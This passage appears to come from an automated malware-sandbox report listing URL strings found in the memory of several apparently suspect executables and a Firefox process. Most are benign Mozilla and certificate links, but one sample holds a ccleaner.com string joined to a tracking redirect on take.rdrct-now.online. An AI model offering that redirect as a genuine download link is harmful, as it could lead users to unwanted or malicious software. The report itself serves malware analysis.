Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2997499284.00000294B5D7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 5a20612cd1.exe, 0000000F.00000003.2573768570.0000000001118000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microX
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001F.00000002.2892879533.00000294A8505000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2913315248.00000294ACA17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2961206470.00000294AEA99000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF9ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF9DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2976050815.00000294B00AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2969171257.00000294AF63C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_REQUEST_BODY_SENT
Source: firefox.exe, 0000001F.00000002.2972970478.00000294AF9A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2892879533.00000294A853E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001F.00000002.2906853139.00000294AC110000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001F.00000002.2888692712.00000294A7C61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001F.00000002.2888692712.00000294A7C61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions$c
Source: firefox.exe, 0000001F.00000002.2924932014.00000294AD016000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3005923236.00002CD4BB604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3002467721.00000C7EBB943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3003702823.00001C0E8DC00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3005923236.00002CD4BB604000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGatehttp://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatmenthttp://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOuthttp://mozilla.org/#/properties/localizations
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0resource://activity-stream/lib/ASRouterPreferen
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariantshttp://mozilla.org/#/properties/autoFillAdaptive
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollment
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedEnrollmentresource://normandy/lib/ClientEnvironment.sys.mjs
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabledhttp://mozilla.org/#/properties/weatherKe
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestOnboardingDialogVariation
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataType
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsDataTypehttp://mozilla.org/#/properties/qu
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestRemoteSettingsEnabledhttp://mozilla.org/#/properties/qui
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenariohttp://mozilla.org/#/properties/quickSuggestSpon
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShouldShowOnboardingDialog
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestShowOnboardingDialogAfterNRestarts
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredIndex
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/recordNavigationalSuggestionTelemetry
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showSearchTermsFeatureGate(
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherFeatureGate
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLength
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywordsMinimumLengthCap
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/0
Source: firefox.exe, 0000001F.00000002.2969171257.00000294AF61A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2969171257.00000294AF663000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2984807918.00000294B420E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B4142000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2912004536.00000294AC803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2768166027.00000294ABF4E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9BE4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2986949900.00000294B43CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2969171257.00000294AF645000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2989111865.00000294B4440000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2905187910.00000294ABF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2905187910.00000294ABF07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2841617207.00000294B43CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2842841573.00000294AE9C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2993230028.00000294B4703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2951927454.00000294AE314000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2907348799.00000294AC3FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972970478.00000294AF95A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2920485104.00000294ACC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B4184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2779978103.00000294AC3EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: firefox.exe, 0000001F.00000002.3003383813.0000169348D00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/Z
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001F.00000002.2888692712.00000294A7CDC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001F.00000002.2933221891.00000294AE153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B4184000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001F.00000002.2933221891.00000294AE153000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2888692712.00000294A7CDC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B4184000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: 3e3be1ecc4.exe, 0000000D.00000003.3089794015.00000000056E1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089137215.00000000056E1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089580514.00000000057E4000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3089961205.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, 3e3be1ecc4.exe, 0000000D.00000003.3090206271.00000000056E1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: firefox.exe, 0000001F.00000002.2898856802.00000294A9BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: file.exe, file.exe, 00000000.00000002.2225886155.000000006C5CD000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updateBITS_IDLE_NO_PROGRESS_TIMEOUT_SECSPREF_APP_UPDATE_SERVICE_MAXE
Source: firefox.exe, 0000001F.00000002.2972627583.00000294AF723000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 0000001F.00000002.2931152196.00000294ADFEB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A869E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8626000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8696000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2898856802.00000294A9B5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2908193137.00000294AC419000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8672000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A86AB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2908193137.00000294AC403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2893501186.00000294A8644000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2958725609.00000294AE94E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001F.00000002.2930582293.00000294ADE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulPlacesUtils.keywords.removeFromURLsIfNo
Source: firefox.exe, 0000001F.00000002.2893501186.00000294A869E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/browser-gestur
Source: file.exe, 00000000.00000002.2225295633.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2217516520.00000000062E2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B4184000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 5a20612cd1.exe, 00000011.00000003.2867480478.000000000586D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2928411061.00000294ADC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2982705596.00000294B4184000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001F.00000002.2997499284.00000294B5DE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://youtube.com/
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001F.00000002.2891781284.00000294A8080000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
